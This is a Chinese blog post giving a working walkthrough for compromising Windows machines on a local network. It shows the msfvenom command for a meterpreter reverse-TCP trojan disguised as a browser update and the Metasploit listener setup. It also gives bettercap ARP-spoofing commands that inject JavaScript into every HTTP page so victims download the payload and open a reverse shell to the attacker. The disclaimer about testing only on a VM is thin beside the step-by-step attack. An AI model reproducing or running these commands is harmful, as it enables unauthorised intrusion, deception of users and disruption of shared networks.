• kali系统:局域网arp欺骗, 搞定任意windows计算机


      目的

      通过Arp欺骗, 给局域网内的所有用户网页中植入木马, 只要用户运行以后, 就会反弹一个shell到我们计算机

      准备

      kali系统

      metaspolit的使用

      Arp欺骗工具:bettercap

      博客园账号密码(用来上传小马文件)

      metaspolit小马的准备

      因为我本地的ip为151, 溢出后反弹的端口为444, 使用msfvenom生成名字为run1.exe的小马文件:

    msfvenom -p  windows/meterpreter/reverse_tcp LHOST=192.168.1.151 LPORT=444 -f exe > run1.exe

      

      文件是生成了,再把生成的小马文件和其它exe合并, 避免用户下载文件的时候起疑, 我使用exebind这个老工具:

      把生成的exe文件放到服务器上, 我是把文件压缩以后, 放到博客园的个人空间上, 文件名字改为浏览器更新程序, 用户就会以为要更新文件, 然后去下载并打开这个文件

      打开msf的控制台,开始监听本地的端口

    use exploit/multi/handler
    set lhost 192.168.1.151
    set lport 444
    set payload windows/meterpreter/reverse_tcp
    exploit

      bettercap执行Arp欺骗

      bettercap参考官网, 此处省略1W字, 使用bettercap的添加html模块, 给所有的HTTP页面添加JS代码, 当用户点击body标签的时候 , 自动打开新窗口并下载一个exe文件, 命令行的参数最好添加-G指定网关, 添加-T添加攻击主机, 如果没有指定-T参数, 会欺骗局域网内部的所有设备, 欺骗越多, 别人越卡:

    sudo bettercap -I wlan0 -X  -T 192.168.1.150  -G 192.168.1.1  --proxy-module=injecthtml --html-data "<script>document.body.onclick = function(){window.open('http://files.cnblogs.com/files/diligenceday/update.zip')} </script>"

      只要用户浏览器网页的时候, 下载了exe文件,并打开了该exe文件, 那么, 我们的kali机器会收到一个反弹的shell, 剩下的就是为所欲为了

      欺骗全部计算机:

      如果相对局域网内部的所有计算下手 ,bettercap的命令不用指定目标机器的IP, 如果被攻击的局域网流量比价高的情况下,这个局域网的网络会非常卡, 因为所有的流量都会走本地的kali机器, 测试代码如下:

    sudo bettercap -I wlan0 -X -G 192.168.1.1  --proxy-module=injecthtml --html-data "<script>document.body.onclick = function(){window.open('http://files.cnblogs.com/files/diligenceday/update.zip')} </script>"

      问题:

      因为Arp欺骗的缘故, 导致被攻击的机器, 浏览网页的速度超级慢

      如果用户浏览器网页的时候, 如果走的是Https协议的话 , 无法添加自定义代码到Html页面中

      放在服务器上的小马文件, 最好要把http改成https, 否者, 用户下载文件的时候非常慢

      本次渗透只是拿我的虚拟机进行个人测试,并没有搞破坏

      在虚拟机的情况下, 直接外接usb无线网卡, 然后把网桥关闭, 避免bettercap的arp -a的时候出问题

      需要攻击的时候,最好指定目标电脑的IP地址和局域网网关, 会更加保险, 确保能够攻击, 如果bettercap一条信息都没有嗅探到, 就要看看是不是哪里出问题了

      如果要攻击一整个局域网的时候, 最好把需要攻击的电脑先ping通, 避免kali系统没找到路由表信息, 出现漏网之鱼

    作者: NONO
    出处:http://www.cnblogs.com/diligenceday/
    企业网站:http://www.idrwl.com/
    开源博客:http://www.github.com/sqqihao
    QQ:287101329
    微信:18101055830 

    厦门点燃未来网络科技有限公司, 是厦门最好的微信应用, 小程序, 微信网站, 公众号开发公司

  • 相关阅读:
    【mybatis】mybatis查询 结果 用map接收,无实体接收 + 关联子表 一并返回主子表的结果
    【mysql】 mybatis实现 主从表 left join 1:n 一对多 分页查询 主表从表都有查询条件 【mybatis】count 统计+JSON查询
    【mysql】获取某个表所有列名【mybatis】
    【mybatis】mybatis中insert操作,返回自增id
    【mybatis】从一个错误,看mybatis中的#和$的区别
    【java】单实例下的 流水号【21位】
    【mysql】新增列 时间戳
    【vue】搭建vue环境以及要安装的所有东西
    【小程序】小程序开发自定义组件的步骤>>>>>>>>>小程序开发过程中报错:jsEnginScriptError
    jmap错误:unknown CollectedHeap type : class sun.jvm.hotspot.gc_interface.CollectedHeap
  • 原文地址:https://www.cnblogs.com/diligenceday/p/6985500.html
Copyright © 2020-2023  润新知